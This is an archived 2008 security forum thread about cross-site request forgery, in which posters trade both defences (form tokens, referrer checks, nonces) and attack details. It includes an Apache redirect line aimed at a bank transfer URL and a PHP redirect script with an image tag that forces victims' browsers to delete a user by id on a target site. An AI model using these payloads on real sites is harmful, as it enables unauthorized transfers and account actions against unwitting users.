Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
302 Redirect in the httpd.conf
Posted by: ted
Date: March 19, 2008 04:04AM

Hi,all
I've been trying CSRF for a while now, and am surprised at just how many sites are vulnerable.
In the "Cross Site Scripting Attacks: XSS Exploits and Defense", page 111 tells:
Quote

"
......
This is an example Apache redirection in the httpd.conf or .htaccess file:
Redirect 302 /a.jpg https://somebank.com/transferfunds.asp?amnt=1000000&acct=123456
......
"
And I found it can work, is there any way to get around this to protect our users?

_______________________________________________________________
Nature is wonderful!
One million years ago, she didn't know our going to need glasses.
But look where she put our ears!



Edited 1 time(s). Last edit at 03/19/2008 04:08AM by ted.

Options: ReplyQuote
Re: 302 Redirect in the httpd.conf
Posted by: Gareth Heyes
Date: March 19, 2008 04:26AM

@ted

Form tokens or referrer checking (to some extent) will protect users.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: 302 Redirect in the httpd.conf
Date: March 19, 2008 09:02AM

Take Gareth's advice, and use nonces, POST requests, and referrer checking combined for a more secure application. It never hurts to layer your security.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: 302 Redirect in the httpd.conf
Posted by: Gareth Heyes
Date: March 19, 2008 09:04AM

Yeah good point, POST requests should be used when changing the state of your application but even so using them alone will not protect you from CSRF only prevent the type stated in this thread.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: 302 Redirect in the httpd.conf
Posted by: ted
Date: May 30, 2008 03:48AM

Thanks so much, I found that many websites couldn't realize the CSRF attack in this way, and use the GET method to request the data.

But in some cases, they set the user id as one of the parameter, such as
Quote

Redirect 302 /a.jpg http://www.somebank.com/transferfuns.php?user_id_from=1231&user_id_to=2221&count=1000000000000
That means one picture can only attack one person,I am thinking about that if we can post a comment in someone's blog with a picture like this:
<img src="http://www.evilsite.com/a.jpg?user_id_from=1231">
and in the server side -- evilsite.com will put the user_id_from into the httpd.conf.

In this case, we need not to change the httpd.conf everytime when we was attacking someone.

Will it possiple?

_______________________________________________________________
Nature is wonderful!
One million years ago, she didn't know our going to need glasses.
But look where she put our ears!



Edited 1 time(s). Last edit at 05/30/2008 03:49AM by ted.

Options: ReplyQuote
Re: 302 Redirect in the httpd.conf
Date: May 30, 2008 09:09AM

It took me a second read to understand exactly what you were asking, but yes it is possible to specify a value inside of a parameter which will be sent to the server-side script upon being viewed, and subsequently causing the browser to issue an HTTP GET request. You will need a bit more work than just modifying the .htaccess, or the httpd.conf file in order to achieve the desired effect however it is still done easily with a small amount of PHP, or Perl. Basically your script would look similar to this:
if (isset($_GET["victimid"]))
{
$UserID = $_GET["victimid"];
header("Location: http://www.targetsite.com/filename.file?csrf=deleteuser&id=" . $UserID);
exit;
}
else
{
//Execute some code to display an image, or something.
}
Then you would simply post an IMG tag pointing to your script, where you would manually supply the value in the "victimid" variable.
<img src="http://www.thirdpartywebsite.com/csrfexample.php?victimid=12345">


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: 302 Redirect in the httpd.conf
Posted by: ted
Date: June 03, 2008 08:58PM

Thanks Awesome, it works!

Options: ReplyQuote


Sorry, only registered users may post in this forum.